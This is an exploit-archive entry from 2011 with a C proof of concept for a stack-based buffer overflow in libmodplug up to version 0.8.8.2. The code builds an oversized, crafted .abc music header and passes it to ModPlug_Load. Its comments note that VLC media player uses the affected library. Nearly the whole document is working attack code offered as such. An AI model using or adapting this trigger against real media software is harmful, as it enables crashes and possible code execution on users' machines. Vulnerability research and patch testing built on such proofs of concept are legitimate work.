libmodplug <= 0.8.8.2 .abc Stack-Based Buffer Overflo



EKU-ID: 94 CVE: OSVDB-ID:
Author: epiphant Published: 2011-04-28 Verified: Verified
Download:

Rating

Home


#include <libmodplug/modplug.h>
#include <stdio.h>
#include <string.h>

/*
libmodplug <= 0.8.8.2 .abc stack-based buffer overflow poc

http://modplug-xmms.sourceforge.net/

by: epiphant

this exploits one of many overflows in load_abc.cpp lol

vlc media player uses libmodplug

greets: defrost, babi, ming_wisher, emel1a, a.v., krs

date: 28 april 2011

tested on: centos 5.6
*/

int main(void)
{
  char test[512] = "X: 1\nU: ";
  unsigned int i;

  i = strlen(test);
  while (i < 278)
    test[i++] = 'Q';
  test[i++] = '1' + 32;
  test[i++] = '3';
  test[i++] = '3';
  test[i++] = '4';
  while (i < 286)
    test[i++] = 'A';
  test[i++] = '\n';
  test[i] = '\0';

  strcat(test, "T: Here Without You (Transcribed by: Bungee)\n");
  strcat(test, "Z: 3 Doors Down\n");
  strcat(test, "L: 1/4\n");
  strcat(test, "Q: 108\n");
  strcat(test, "K: C\n\n");
  strcat(test, "[A,3A3/4] [E9/8z3/8] A3/8 [c9/8z3/8] [A9/8z3/8] [E3/4z3/8]\n");

  i = strlen(test);
  ModPlug_Load(test, i);

  return 0;
}